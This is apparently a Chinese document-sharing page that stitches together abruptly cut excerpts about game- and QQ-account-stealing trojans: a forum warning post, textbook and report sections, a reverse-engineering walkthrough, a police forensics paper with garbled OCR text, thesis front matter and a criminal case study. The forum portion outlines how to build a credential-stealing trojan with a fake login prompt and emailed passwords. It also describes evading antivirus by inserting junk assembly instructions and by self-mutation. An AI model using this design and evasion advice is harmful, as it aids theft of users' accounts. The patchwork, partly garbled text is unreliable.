对一款盗号木马的详细分析
- 格式:docx
- 大小:18.25 KB
- 文档页数:6
各类盗号木马是这样盗取你看似不可能盗取的网游帐号密码的!详细讲解帖子比较长,有耐心的就看下去吧,绝对有收获首先先问大家几个问题,大家对号入座,看有没有你对上的情况。
1、有多少人的电脑没有装杀毒软件、防火墙,或者说有多少人装了且正确使用的;2、有多少人在玩游戏的时候QQ聊得热火朝天;3、有多少人装系统的时候用的是番茄花园等一系列所谓电脑公司专用系统盘的;4、有多少人从来不关心微软每天发布的层出不穷的补丁的;5、有多少人受不了诱惑去看PLMM的视频或照片;6、有多少人在家上网,不设电脑密码或密码没有复杂性的;7、有多少人家里电脑开启GUEST账户,且登录时用非Administrator账户登陆,尽管设置了密码,但最高权限的Administrator账户却无密码的(请搞清楚这段话什么意思);8、有多少人在公司或机关上网,有硬件防火墙便不做任何防范措施的;9、有多少人使用有未知风险的辅助的; (注:风大和大大们的小M等辅助挂可以放心使用,但新手发的要小心)10、有多少人是在极不安全的网吧上网的;11、有多少人会看些不安全网站(**、暴力等)的;12、有多少人喜欢随手点一些不明链接的;13、有多少人喜欢贪图小便宜,相信问道里的小道或陌生消息去看非官方网站的;14、有多少人看别人盗号眼红,自己去网上搜索下载盗号木马的;大家自己对对看,有的人抱怨我没上QQ、没上黑网等等的。
其实你们仔细想想,恐怕大多数被盗号的人都干过这些中的某一条或很多条(当然不包括那些相信所谓朋友,自己给人家账号的笨蛋)。
接下来详细谈。
说起盗号,不能不谈QQ盗号。
我想问道里QQ号被盗的人数肯定远远超过游戏号被盗的人数。
对大多数网民来说,QQ盗号也许是他们接触的最早的盗号现象了.早期的盗取Q号的方法主要有两种.一,是本地机器种木马.这是极为普遍的一种方法,而且很简单,只要您能有一个QQ(或游戏)木马就行,这种软件可以说遍地都是,数量很多,随便到哪个小黑客网站都能找到,其工作原理也很简单,首先它具备记录功能,敲入的密码可以自动记录下来,当木马被“种”到您的电脑里之后,它会更改注册表,随系统启动而自动运行,并会自动侦测QQ(游戏)的进程,一旦运行QQ(游戏)它就开始记录键盘输入,有的木马会先弹出个伪装窗口和QQ登陆窗口一样,等您把号码、密码都输入后点确定,它会提示密码不正确,关闭后再弹出真正的登陆框,无论是以上哪种方法,此时您的QQ号+密码已经被发至盗号者的邮箱了。
详细的写一个电脑病毒介绍:什么样的程序算一个计算机病毒?编写一个计算机病毒难么?看下面几个程序:1.强行退出QQ的程序。
2.弹出一个置顶的dialogue的程序。
3.能在后台收发电子邮件的程序。
上面三个程序都不难写,可以说很简单,只要简单的调用windowsAPI就可以完成。
如果把这三个程序合并起来:检测该电脑QQ是否是自动登录->强行关闭QQ->模仿QQ风格弹出对话框“您的账号存在风险,请重新输入密码登陆。
”->后台Email账号密码到指定邮箱->打开QQ,自动登录。
这就是一个很简单的木马病毒:盗号木马。
但是这样的木马真的能派上用场么?1.目标受害者以什么理由去打开它?对了,把木马图标改成doc,里面放点不知所云的东西,没有显示扩展名,或者不认识后缀名的小白就会打开它了。
2.杀毒软件不管它么?杀毒软件自然不会混吃等死:其一:杀软会寻找大部分类似木马的特征,检测到你的木马。
怎么办,有人想到了免杀免杀_百度百科的方法。
有不少杀毒软件检查特征都是基于散列,我只要在代码中插入汇编{push ecx;add ecx,8;xor ecx,eax;pop ecx} 这样的代码花指令_百度百科我程序的特征散列就会变化,杀毒软件没有收录这样的新特征,或者不认识这样的花指令,木马就会被放过。
同样,基于这个思想,木马可以自己修改自己的花指令,实现自我变种的木马,这样的木马更难被发现,查杀。
其二:杀软会分析你的软件行为,看看你究竟在干什么。
主动防御_百度百科也许有人用过外挂,杀软会提示你有高危程序在进行内存注入。
这就是主动防御。
那么你要不被主动防御发现,你就得绕过他的检测,要绕过他的检测,你就得知道他是如何检测的,这里以分析了一下360安全卫士的hookzt这篇文章为例子。
那么究竟怎样绕过呢?本小姐也不知道,,,毕竟不是写病毒的。
【以下纯属瞎掰要注意】3.这个木马被“云”盯上了!现在步入了云时代,云查杀方便又快捷,然而用户也是云的一部分,他们遭遇的新exe文件会被上报到杀软的可以文件中心,交由人工分析。
5.5木马技术5.5.1 木马技术概述木马的全称是“特洛伊木马”(Trojan horse),来源于希腊神话。
古希腊围攻特洛伊城多年无法攻下,于是有人献出木马计策,让士兵藏匿于巨大的木马中,然后佯作退兵,城中得知解围的消息后,将“木马”作为战利品拖入城内,匿于木马中的将士出来开启城门,与城外部队里应外合攻下特洛伊城,后世称这只大木马为“特洛伊木马”。
网络世界的特洛伊木马是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和DoS攻击等特殊功能的后门程序。
它与控制主机之间建立起连接,使得控制者能够通过网络控制受害系统,通信遵照TCP/IP协议,最大的特征在于隐秘性,偷偷混入对方的主机里面,但是却没有被对方发现。
就象一个潜入敌方的间谍,为其他人的攻击打开后门,这与战争中的木马战术十分相似,因而得名木马程序。
实际上计算机网络木马不但可以窃取、破坏被植入主机的信息,而且可以通过控制主机来攻击网络中的其它主机。
木马程序不仅可能侵害到个人乃至某些公司的利益和权力,更可能危及整个社会和国家的利益和安全。
如果公安部用于采集处理人们身份证信息的计算机被安装了木马,那么这些信息就可能被木马以有线或无线的方式通过网络泄露出去,后果不堪设想。
木马是受控的,它能分清敌我,所以与分不清敌我的其它病毒和攻击技术相比,具有更大的危险性和破坏性。
木马是近几年比较流行的危害程度较严重的恶意软件,常被用作网络系统入侵的重要工具和手段。
2008年金山病毒报告监测显示,木马攻击占当前网络病毒的70%以上,已经成为当前网络危害最严重的网络病毒。
网络上各种“种马”技术加剧了木马的流行和发展,由于木马控制了被植入者的计算机,它几乎可以在被植入主机上为所欲为,破坏程度非常巨大,可以窃取账号密码、删除文件、格式化磁盘,甚至可以打开摄像头进行偷窥等;木马往往又被用做后门,植入被攻击的系统,以便为入侵者再次访问系统提供方便;或者利用被入侵的系统,通过欺骗合法用户的某种方式暗中“散发”木马,以便进一步扩大入侵成果和入侵范围,为进行其它入侵活动,如分布式拒绝服务攻击(DDoS)等提供可能。
木马分析报告1. 引言木马(Trojan),又称为“特洛伊木马”,是指通过伪装成正常合法程序或文件进入目标系统,并在未被用户察觉的情况下,对系统进行非法操作的恶意软件。
木马程序的存在给系统安全带来了重大威胁,因此,对木马进行深入分析和研究十分必要。
本文将对一款木马进行分析,并对其传播方式、特征和危害进行探讨。
2. 木马的传播方式木马程序主要通过以下几种方式进行传播: 1. 邮件附件:木马程序常常伪装成诱人的附件,通过邮件发送给用户,一旦用户点击或下载附件,木马程序就会悄悄安装和运行。
2. 网络下载:用户在未经过恶意网站的仔细筛选的情况下,下载了含有木马的软件或文件,木马程序就会被安装到用户的系统中。
3. 可移动存储介质:如U盘、移动硬盘等存储介质中含有木马程序,只要用户将这些介质连接到自己的电脑上,木马程序就会被植入系统。
4. 动态链接库:木马程序可能会以DLL(Dynamic-Link Library)的形式出现,通过注入到正常进程中,实现对系统的控制。
3. 木马的特征为了能够更好地进行木马防护,我们需要了解木马的一些特征: 1. 欺骗性:木马程序通常伪装成合法可信的程序或文件,例如常见的.exe、.doc、.pdf等,以迷惑用户进行安装或下载。
2. 启动项修改:木马程序常常会修改系统的启动项,以保证自己能够在系统启动时自动运行,从而实现长期隐藏控制。
3. 远程控制:木马程序通常与远程服务器建立连接,以便黑客能够远程控制被感染的系统,进行各种操控、监控和窃取敏感信息等操作。
4. 系统资源占用增加:木马程序运行时会消耗大量系统资源,例如CPU和内存,从而降低系统的整体性能。
5. 网络流量增加:木马程序会通过网络上传、下载数据,导致网络流量明显增加,对网速造成影响。
4. 木马的危害与预防木马程序给系统带来的危害非常严重,包括但不限于以下几个方面: 1. 数据窃取:木马程序可以利用系统权限,窃取用户的个人隐私数据,例如登录名、密码、银行账号等。
QQ盗号木马之逆向分析电脑已经走进我们的生活,与我们的生活息息相关,感觉已经离不开电脑与网络,对于电脑安全防范,今天小编在这里给大家推荐一些电脑病毒与木马相关文章,欢迎大家围观参考,想了解更多,请继续关注店铺。
一般来说,病毒分析不会涉及到算法问题,如果是要分析算法(如我之前对于CM4注册机制的分析),那么我们更多地是需要关注程序的流程与逻辑,一般不深究CALL的具体内容。
而病毒分析则往往需要搞清楚各个不同的CALL的意义,才能够弄清楚病毒的行为。
所以本文的第一部分着重讲述对这些CALL的剖析。
而第二部分则简单讨论一下进程守护技术的实现。
逆向分析这里我们跳过程序的初始化部分,来到第一个API函数的位置:我们能够直接看到的第一个API函数是GetModuleFileName,这个函数用于获取当前进程已加载模块的文件的完整路径,该模块必须由当前进程加载。
而该函数的返回值则是文件路径长度,该返回值保存在了EAX中,为2B,也就是说路径长度为2B个字符。
可以看一下所返回的路径是什么。
路径保存在“PathBuffer”中,跟踪该地址查看:可见程序已正确获取了当前文件的地址。
然后继续分析下一个API 函数:这里出现了ShellExecute这个函数,它的功能是运行一个外部程序(或者是打开一个已注册的文件、打开一个目录、打印一个文件等等),并对外部程序有一定的控制。
具体到本程序,ShellExecute会运行Explorer.exe程序来打开“d:\”,其实也就是使用程序管理器打开D 盘根目录。
但是执行这个API函数是有条件的,它需要根据第二行CALL语句的结果进行判定,那么有必要进入这个CALL,看看需要满足什么条件才能够执行ShellExecute。
进入oso.00403C48这个函数程序会对EAX和EDX中的内容进行比对,其中EAX保存的字符串就是我们之前使用GetModuleFileName所获取的当前文件的路径,只不过被转化成了大写字符。
木马的7种分类木马是一种恶意软件,通常指像木马一样隐藏在合法程序中,以迷惑用户并偷窃或破坏用户的数据和系统的程序。
木马的种类繁多,可以根据不同的特征进行分类。
下面是木马的7种分类:1. 远控木马远程控制木马是一种可以在远程控制的木马程序。
通过远程控制木马,黑客可以远程控制感染电脑,窃取用户的文件、账户信息、密码等。
远控木马通常会进行隐匿性处理,尽量减少对受害者电脑系统的影响,以达到长期或持续控制的效果。
2. 数据窃取木马数据窃取木马是一种专门用于窃取用户的敏感数据的木马程序。
这种类型的木马通常会窃取用户的账户信息、信用卡信息、密码等,然后通过网络传输到黑客的服务器上。
数据窃取木马对用户的隐私和安全造成了严重威胁,并且往往会导致财产损失。
3. 网络蠕虫木马网络蠕虫木马是一种具有自我复制和传播能力的木马程序。
它可以自动在网络上寻找漏洞并感染其他主机,从而扩大感染范围。
网络蠕虫木马的传播速度非常快,对网络安全造成了严重威胁,可能导致整个网络瘫痪。
4. 金融木马金融木马是一种专门用于窃取用户银行账户信息和密码的木马程序。
它通常会伪装成银行网站或在线支付平台,诱使用户输入账户信息和密码,然后将这些信息发送给黑客。
金融木马对用户的银行账户和资金造成了重大威胁,可能导致财产损失。
5. 后门木马后门木马是一种可以在系统中留下后门,使黑客可以随时再次进入感染的电脑的木马程序。
后门木马通常会隐藏在系统的某个安全漏洞中,可以在系统重新启动后自动运行,从而对系统的安全造成了严重威胁。
6. 特洛伊木马特洛伊木马是一种通过伪装成合法和实用的软件,骗取用户下载和安装的木马程序。
特洛伊木马通常会隐藏在某个看似有用的软件中,一旦用户下载并安装,木马就会感染用户的电脑,窃取用户的数据。
7. 广告木马广告木马是一种通过弹出恶意广告或强制跳转广告网页的木马程序。
它通常会在感染的电脑中安装恶意的浏览器插件或改变浏览器的默认设置,以触发广告弹窗。
基于FTP 协议的盗号木马通信流量分析方法研究**基金项目:中央高校基本科研业务费项目(编号:3242017013);公安部理论及软科学研究计划(编号:2Q2QLEYpgXY031);公安部理论■及软科学 研究计划(编号:2016LLYpgXY013 );公安部技术研究计划课题(课题批准号20igSYJB06 );辽宁省社会科学规划基金项目(编号:L16BEXD12 )沈耀童1徐国天’程斌彳1.中国刑事警察学院2.公安部第三研究所摘 要:目前,办案人员主要采用静态分析和动态分析法对盗号木马进行取证分析,获取网络入侵痕迹,但是现有取证方法较为繁琐,对办案人员专业知识水平要求较高,且获取的入侵痕迹不够全面。
针对上述问题,采用通信流量分析法对盗号木马进行取证分析,以使用FTP 协议的HawkEye keylogger 盗号木马为例,通过细致分析木马与外界的通信数据流,根据其连接建立过程,还原盗取的用户隐私信息,确定黑客控制端IP 地址、端□号等入侵线索。
实验结果表明, 与现有取证方法相比,该方法能够全页、快速、准确获取盗号木马相关痕迹信息,灵活性较高,既能对常规盗号木马(通常采用SMTP 协议和HTP 协议)进行分析,又能对使用FTP 协议的新型盗号木马进行深入取证,符合公安一线工 作需求。
关帧»$原 mW 盗号栉 取砌析引言据国家互联网应急中心发布的《2049年中国互联网网 络安全报告》显示,2019年,我国境内感染恶意程序的主机数量约582万台,其中信息窃取类恶意软件占恶意程序总量的11.6%[1I o 盗号木马是一种典型的信息窃取类软件,它可以监控受害者的键盘输入记录,获取用户的邮箱、银行 卡、网络游戏等账号密码以及手机号、身份证号、电脑桌面应用馳感信息,并将其发攻击者,攻击者用户的敏感信息后,可以对用户实施精准诈骗,或将用户隐私信息售卖,间接促进网络黑灰产业的发展。
因此研究盗号 木马的取证方法对公安机关维护网络空间安全有重要意义。
详细讲解主流盗号方式一、盗号木马:盗号木马是指隐秘在电脑中的一种恶意程序,并且能够伺机盗取各种需要密码的账户(游戏,应用程序等)的木马病毒。
盗号木马已经是老生常谈的问题了,差不多所有玩家对木马都已经有所防范。
那么,我们先来进行渠道分析 1、网站:通过浏览带颜色的一、盗号木马:盗号木马是指隐秘在电脑中的一种恶意程序,并且能够伺机盗取各种需要密码的账户(游戏,应用程序等)的木马病毒。
盗号木马已经是老生常谈的问题了,差不多所有玩家对木马都已经有所防范。
那么,我们先来进行渠道分析1、网站:通过浏览带颜色的网站、恶意网址下载得到,一般是下载到病毒,然后有病毒在指定网站后台下载各类木马。
2、网上下载东西捆绑木马:QQ 上发来的文件、论坛上的附件、邮箱附件等等,此类木马一般隐藏在rar 、zip 等压缩文件中,一旦解压自动运行3、网吧、公共系统内隐藏:可由一些居心不良的电脑修理工或网管装在系统中,不会随系统重启而还原,也有黑客破解还原系统后装入。
了解到渠道后我们进行它的工作原理解剖,附上一张木马生成器的图,它进入电脑后,当电脑主人登陆游戏输入账号密码,它会进行记录,并将账号密码发送到指定的ASP 空间,也就是俗称的ASP 收信,简单一点的就是邮箱收信。
(不得不说,大部分木马有踢你下线重上再输密码的功能,造成假掉线的情况) 这是木马生成器的截图这是收信的空间防范措施:1、最根本的方法,少上不和谐的网站,避开下载到木马病毒的可能2、下载东西尽量上有信誉有口碑的大网站,如华军、多特等。
3、即使打好系统补丁,一个有漏洞的系统要想入侵可是很简单的事情4、做好系统安全必要的检查:建议隔2个星期全盘杀毒一次,这里给一些迷茫的人推荐一下杀软:系统配置好的用卡巴斯基套装,网上有30天使用补丁,可以免费永久的用。
系统配置差的和本本推荐NOD32,目前360正在搞活动送半年。
再推荐使用360保险箱,360保险箱功能很强大的。
二、钓鱼网站:所谓“钓鱼网站”是一种网络欺诈行为,指不法分子利用各种手段,仿冒真实网站的URL 地址以及页面内容,或者利用真实网站服务器程序上的漏洞在站点的某些网页中插入危险的HTML代码,以此来骗取用户银行或信用卡账号、密码等私人资料。
毕业论文(设计)论文(设计)题目:木马攻击技术彻底剖析学院:理工学院专业(方向):计算机科学与技术(网络工程)年级、班级:网络1101 学生姓名:指导老师:2015 年 5 月 15 日论文独创性声明本人所呈交的毕业论文(设计)是我个人在指导教师指导下进行的研究工作及取得的成果。
除特别加以标注的地方外,论文中不包含其他人的研究成果。
本论文如有剽窃他人研究成果及相关资料若有不实之处,由本人承担一切相关责任。
本人的毕业论文(设计)中所有研究成果的知识产权属三亚学院所有。
本人保证:发表或使用与本论文相关的成果时署名单位仍然为三亚学院,无论何时何地,未经学院许可,决不转移或扩散与之相关的任何技术或成果。
学院有权保留本人所提交论文的原件或复印件,允许论文被查阅或借阅;学院可以公布本论文的全部或部分内容,可以采用影印、缩印或其他手段复制保存本论文。
加密学位论文解密之前后,以上声明同样适用。
论文作者签名:年月日木马攻击技术彻底剖析摘要如今是大数据的时代,有效的信息能够带来巨大的效益,它作为一种普遍性、共享性、增值型、可处理性和多效用性的资源,使其对于人类具有特别重要的意义。
信息安全的实质就是要保护信息系统或网络信息传输中的信息资源免受各种类型的威胁、干扰和破坏,即保证信息的安全性。
信息安全是一个不容忽视的国家安全战略,任何国家、政府、部门、行业都不可避免的问题。
因此,在计算机信息安全领域,对计算机木马技术的研究已成为一个重点和热点。
本文对计算机木马攻击技术进行了系统的分析和研究,主要工作如下:1.对木马的基本概念进行说明、攻击机制进行剖析。
2.采用“冰河”实例进行剖析说明。
3.在研究了木马隐蔽技术的基础上,提出了一个动静特征相结合的行为木马特征检测技术基本框架。
尽最大能力去检测与防范木马攻击。
【关键词】木马攻击,计算机信息安全,木马检测,木马防范Trojan horse attack technologys ThoroughanalysisAbstractToday is the era of big data, effective information can bring huge benefits, it is a kind of universality, sharing, value-added, processing and multi utility of resources, which is of special significance for human. The essence of information security is to protect the information systems or information transmission network information resources from various types of threats, interference and destruction, which is to ensure the safety of information. Information security is an important national security strategy, any country, government, departments, industries are inevitable problems. Therefore, in the field of computer information security, research on computer Trojan technology has become a key and hot. This paper carried out a systematic analysis and Research on computer technology of the Trojan horse attack, the main work is as follows:1. analyze the attack mechanism of basic concepts of Trojan horse.2. by the analysis of examples to illustrate the "ice age".3.According to the static characteristics of the Trojan based on theweaknesses and Trojan hidden methods, put forward the basic framework of the Trojan detection system of the static characteristics of Trojan detection and dynamic behavior of Trojan detection combined, as much as possible to prevent the Trojan horse attack.[Key words]Trojan attacks, computer information security, Trojan detection, Trojan guard目录1 绪论 (1)1.1木马研究的背景与意义 (1)1.2本课题研究的内容 (2)2 木马攻击机制剖析 (3)2.1概述 (3)2.2木马的定义 (4)2.3木马的攻击模式剖析 (4)2.4木马的攻击特点剖析 (5)2.5木马攻击能力剖析 (6)2.6木马实施攻击的步骤剖析 (7)2.7木马伪装方法剖析 (8)2.7.1 木马启动方式的隐藏技术 (11)2.7.2木马运行形式的隐藏技术 (17)2.7.3 木马通信形式的隐藏技术 (19)2.7.4木马程序在宿主机磁盘上的隐藏 (25)2.8木马的传播途径剖析 (26)3 “冰河”木马实例分析 (27)3.1“冰河”起源与发展 (27)3.2服务端与客户端实现原理 (27)3.3隐藏的实现原理 (28)3.4木马的启动实现 (28)3.5远程控制的实现原理 (29)3.6实现冰河服务器的配置 (30)3.7冰河在目标主机中的隐藏 (31)3.8冰河在目标主机中的控制 (33)3.9冰河木马的查杀 (33)4 动静结合的木马检测防范技术 (34)4.1基于动态行为的木马检测防范技术 (34)4.1.1 行为监控检测防范木马的基本思想 (34)4.1.2 动态检测与防范木马的主要方法 (35)4.2动静结合的木马检测防范体系的分析 (37)4.3动静结合的木马检测防范技术评价 (39)5 结论 (41)参考文献 (42)致谢 (43)1 绪论1.1 木马研究的背景与意义如今计算机科学技术的迅猛发展和广泛应用,使计算机之间的网络通信成为现代社会不可缺少的基本组成部分,具有全球化的互联网技术影响着人类经济、政治、社会的方方面面,对经济可持续发展、国家信息安全、国民教育和现代化管理都起着重要的作用。
盗号木马的原理及如何防范盗号木马的原理及如何防范随着互联网技术的迅速发展网络给人们带来了极大的便利,日益发达的网络产品越来越多。
各种网络应用都离不开账号密码,账号密码是网络身份的一种标识。
这些帐号密码所代表的是巨大的经济价值与个人的隐私。
一些动机不纯的黑客高手就想尽办法利用灰色的网络技术和功能强大的盗号木马盗取相应的密码和帐号,给我们的生活带来难以言喻的困扰。
现在就盗号木马的特点和防范方法跟大家一起讨论一下,希望对于保护账号安全起到一定的帮助作用。
木马的特点1 隐秘性也就是说,一旦一个木马通过各种手段被引入了主机(这个过程称为“植入”),那么它首先要找到一个地方隐藏起来,等待时机发作,在被植入的主机看来就好像什么事情都没有。
2 自动运行性一个好的木马绝对不可能奢望对方来点击运行,也不能只执行一次,然后随着系统的关机而不再运行,这样的只发作一次的木马是没有什么作用的。
木马往往具有自动运行性,也就是说要么随机子的启动运行而发作,要么等某个条件来触发,而这个触发条件应该很常用的。
3 危害性如果一个木马没有什么危害,那么它也就失去了入侵的目的,一个木马的危害性主要表现在控制性上,木马的制作者通过植入木马,然后非法获取系统的权限,达到最终控制对方机子的目的,比如它可以偷听你的密码(盗号),修改你的文件,下载感兴趣的文件,甚至格式化硬盘。
盗号木马的原理1 偷梁换柱型盗号者入侵你的.电脑后,会把你的程序的快捷方式换成盗号者自己制作的登陆界面,当你打开“网络程序”登陆界面进行登陆的时候,第一次输入密码后,会提示密码错误等信息,同时记录下你的账号和密码,然后会自动跳转到真实的登陆串口,这时你就能真的登陆上去了,你不知道的是,其实你的资料已经发到盗号者的邮箱或者空间去了。
2 直接替换型盗号者会直接把你“网络程序安装文件夹”里面的一些文件替换掉。
然后不管你怎么打开都是盗号者的登陆窗口。
也许你会问是怎么登进去的呢?很多程序其实还有另外一种登陆方式,那就是在CMD命令行登陆,所以,盗号者在他的登陆界面代码里面协商把你的输入账号和密码在CMD下登陆并且设置CMD不显示,也就神不知鬼不觉的盗取了账号密码了。
对有关病毒木马的案例分析通过学习网络安全法律法规,我们对“大小姐木马”与“熊猫烧香病毒”做出了学习与分析。
一、“大小姐”病毒起因与发展。
2008年5月6日,南京市公安局网络警察支队接江苏省水利厅报案称,该厅政务网站“江苏水利网”页面无法打开,怀疑疑被黑客侵入。
据了解,江苏省水利厅网站主要承担公文办理、汛情下达等重要任务,日访问量在5000人次。
当时,江苏全省已进入汛期,该网站能否正常运行将直接影响全省防汛工作。
南京市公安局网络警察支队将其立为破坏计算机信息系统案侦查,并迅速会同鼓楼公安分局抽调精干警力,成立“5·6”专案组。
攻击是为植入“大小姐”木马专案组围绕省水利厅网站被黑客攻击案,迅速开展勘查取证、侦查侦控、追查抓捕等侦查工作。
去年5月14日至6月6日,专案组在湖北宜昌、广西桂林、湖北潜江等地抓获何某等6名犯罪嫌疑人,成功侦破水利厅网站被攻击案。
在侦破水利厅网站被攻击案件过程中,专案组发现,这些人攻击水利厅网站的目的,是为了在该网站上植入一款名为“大小姐”的木马盗号程序。
而这个“大小姐”木马早已臭名昭著,不少网络游戏账号均被该木马程序盗取过。
这一情况引起公安部高度重视,公安部指定南京市公安局管辖此案,并于7月1日挂牌督办本案。
专案组经艰苦工作,分别于6月13日在上海、6月24日在四川广元、绵阳、10月10日在湖南长沙抓获了制作、传播“大小姐”系列木马,破坏计算机信息系统犯罪团伙的组织者王某、作者龙某及销售总代理周某等10人。
犯罪嫌疑人王某以牟利为目的,自2006年下半年开始,雇用犯罪嫌疑人龙某先后编写了四十余款针对国内流行网络游戏的盗号木马。
王某拿到龙某编写的木马程序后,对外谎称为自己所写,同时寻找代理人进行销售,先后通过周某等人在网上总代理销售木马,该木马系列在传播销售时被命名为“大小姐”木马。
购买了“大小姐”木马的犯罪嫌疑人,则分别针对“QQ自由幻想”、“武林外传”、“征途”、“问道”、“梦幻西游”等网络游戏进行盗号。
木马分析报告报告目的:本报告旨在通过对木马程序的分析和研究,为用户提供关于木马的详细信息,帮助用户更好地防范和排除木马程序的威胁。
报告结构:一、概述二、木马程序三、攻击方式四、防范措施五、排除方法六、结论一、概述随着网络技术的不断发展和进步,网络安全问题已成为人们关注的焦点。
木马程序作为一种危险的网络威胁,已经成为网络安全领域重点研究对象。
本报告旨在通过分析和研究木马程序的特点与行为,为用户提供更具体的木马防范措施,并帮助用户更好地解决木马问题。
二、木马程序1、定义木马程序是指在计算机系统中潜藏的一种恶意软件,它可以在用户不知情的情况下窃取用户的计算机信息,甚至控制计算机。
其具有隐蔽性、偷窃性、可控性、纵向渗透性等特点。
2、类型木马程序根据其功能和用途不同,可以分为远程控制木马、流氓软件、钓鱼木马、木马病毒等多种类型。
不同类型的木马程序具有不同的威胁等级和攻击方式。
三、攻击方式木马程序采取的主要攻击方式包括利用漏洞攻击、社会工程学攻击和通过外部控制平台等。
在用户不知情的情况下,木马程序可以通过这些方式远程控制电脑、窃取用户信息、散布病毒等。
四、防范措施为了有效地防范木马程序的攻击,用户需要根据实际情况采取多种防范措施,包括规范安装软件、使用安全浏览器、定期升级杀毒软件、加强密码管理、限制网络功能等。
这些措施可以大大减少木马程序的攻击风险。
五、排除方法用户如果发现自己的计算机已经中木马,应该采取及时有效的处理方式。
具体排除方法包括复原系统、安装杀毒软件、安装木马查杀工具、优化网络安全等。
六、结论通过对木马程序的分析和研究,我们可以发现,木马程序具有多种威胁手段和强大的攻击能力,对计算机和网络安全造成了一定的威胁。
为了有效地防范木马程序的攻击,用户需要根据实际情况采取多种防范措施,定期进行木马查杀和优化网络安全,避免造成不必要的损失。
木马的种类及其技术特征常见的木马病毒,按照其功能划分,有以下几类:●网络游戏木马●网银木马●即时通讯软件木马●网页点击类木马●下载类木马●代理类木马下面一一详细介绍。
1.网络游戏木马随着网络在线游戏的普及和升温,我国拥有规模庞大的网游玩家。
网络游戏中的金钱、装备等虚拟财富与现实财富之间的界限越来越模糊。
与此同时,以盗取网游帐号密码为目的的木马病毒也随之发展泛滥起来。
网络游戏木马通常采用记录用户键盘输入、Hook游戏进程API函数等方法获取用户的密码和帐号。
窃取到的信息一般通过发送电子邮件或向远程脚本程序提交的方式发送给木马作者。
网络游戏木马的种类和数量,在国产木马病毒中都首屈一指。
流行的网络游戏无一不受网游木马的威胁。
一款新游戏正式发布后,往往在一到两个星期内,就会有相应的木马程序被制作出来。
大量的木马生成器和黑客网站的公开销售也是网游木马泛滥的原因之一。
2.网银木马网银木马是针对网上交易系统编写的木马病毒,其目的是盗取用户的卡号、密码,甚至安全证书。
此类木马种类数量虽然比不上网游木马,但它的危害更加直接,受害用户的损失更加惨重。
网银木马通常针对性较强,木马作者可能首先对某银行的网上交易系统进行仔细分析,然后针对安全薄弱环节编写病毒程序。
如2004年的“网银大盗”病毒,在用户进入工行网银登录页面时,会自动把页面换成安全性能较差、但依然能够运转的老版页面,然后记录用户在此页面上填写的卡号和密码;“网银大盗3”利用招行网银专业版的备份安全证书功能,可以盗取安全证书;2005年的“新网银大盗”,采用API Hook等技术干扰网银登录安全控件的运行。
随着我国网上交易的普及,受到外来网银木马威胁的用户也在不断增加。
3.即时通讯软件木马现在,国内即时通讯软件百花齐放。
QQ、新浪UC、网易泡泡、盛大圈圈……网上聊天的用户群十分庞大。
常见的即时通讯类木马一般有3种:一、发送消息型。
通过即时通讯软件自动发送含有恶意网址的消息,目的在于让收到消息的用户点击网址中毒,用户中毒后又会向更多好友发送病毒消息。
几种典型木马的特征及应对措施姓名:冯兴宝学号:1011122019学院:理学院专业:信息与计算科学以前对电脑接触比较少,对计算机病毒了解不多,不知道电脑病毒具有如此大的危害。
下面是我查找与病毒相关的电脑维护方面的书籍总结的几种木马程序。
一,盗QQ密码-木马GOPGOP是Get OICQ Password的缩写,即盗取QQ密码的木马软件。
该木马是用Flash做成的.EXE文件,其本来面目是一个叫Trojan.GOP19hookdll.611400的木马。
该木马感染C:WINNTsystem32下的文件。
这个木马就是专门黑QQ号的木马。
应对措施:(1)用金山“木马专杀”软件查杀。
(2)隐藏自己的IP地址,让自己的踪迹从网络上消失。
(3)删除不明邮件,这些邮件的主题一般是一些很让人开心的话。
二,剑网木马该木马会监视网络中的剑客客户端的运行,记录玩家的账号及密码,并发送给指定的E-mail地址,给广大的剑网玩家带来极大地盗号威胁。
而且,该木马还会造成系统的不稳定和隐私的泄露。
应对措施:下载“剑网木马”专杀工具,进行查杀。
三,QQ尾巴和QQ木马该木马会偷偷藏在用户的系统中,发作时会寻找qq窗口,给在线的好友发送诸如“快去看看,蛮好看的东西。
”之类的假消息,诱惑用户打开一个网站,如果点击该链接的话,就会被病毒感染,然后成为病源,继续传播。
应对措施:(1)不要随便打开陌生人的文件或链接,尽快升级杀毒软件。
(2)下载“QQ尾巴和QQ木马”专杀工具.四,封神木马木马传播者假借提供外挂名义,诱使用户从网站下载该木马并运行,木马运行后尝试关闭部分安全软件的进程,监视用户的鼠标和键盘操作,窃取用户账号密码。
应对措施:(1)不要下载各种外挂程序,以免造成虚拟财富的损失。
(2)进行网络游戏的同时请使用防黑客软件。
(3)升级毒霸,更新病毒库可完全查杀该木马。
五,VB盗窃类木马这是一个生成盗取按键信息的病毒生成器。
该病毒通过将自身的一部分绑定到正常程序上生成新病毒。
木马的7种分类木马是一种计算机病毒,它伪装成合法的程序进入计算机系统,然后在后台运行,以获取用户的个人信息或者控制计算机系统。
根据其特点和功能,木马可以分为以下七种分类:1. 后门木马(Backdoor Trojan):后门木马是最常见的一种木马,它会在计算机系统中留下一个后门,使黑客可以通过这个后门进入受感染的计算机系统。
这使得黑客可以远程控制计算机、获取用户信息或者进行其他恶意活动。
2. 数据采集木马(Data Stealing Trojan):数据采集木马是专门设计用来窃取用户个人信息的木马。
它可以记录用户的敏感信息,例如账户密码、信用卡信息等,并将这些信息发送给黑客。
这种木马经常通过网络钓鱼、恶意链接或者伪装的正规程序传播。
3. 蠕虫木马(Worm Trojan):蠕虫木马是一种可以自我复制和传播的木马。
与其他木马不同,蠕虫木马无需用户主动参与传播,它可以通过网络漏洞自动传播给其他计算机系统。
蠕虫木马通常会耗尽计算机系统的资源,并在网络中形成大规模的传播。
4. 系统破坏木马(Destructive Trojan):系统破坏木马是一种恶意程序,它旨在破坏计算机系统或者删除用户数据。
这种木马可以擦除硬盘上的所有数据、损坏系统文件、关闭重要的安全功能等。
其目的是使受感染的计算机变得不可用。
5. 木马下载器(Downloader Trojan):木马下载器是一种专门用来下载其他恶意软件的木马。
它会在受感染的计算机上下载并安装其他恶意程序,例如间谍软件、勒索软件等。
木马下载器通常通过网络漏洞、欺骗用户或者通过其他恶意程序传播。
6. 远程访问木马(RAT Trojan):远程访问木马允许黑客远程控制受感染的计算机,并进行各种活动,例如窃听、监视、文件传输等。
这种木马可以使黑客完全控制计算机系统,并获取用户的所有信息。
7. 假冒木马(Fake Trojan):假冒木马是一种伪装成木马的程序,其实并不存在真正的恶意代码。
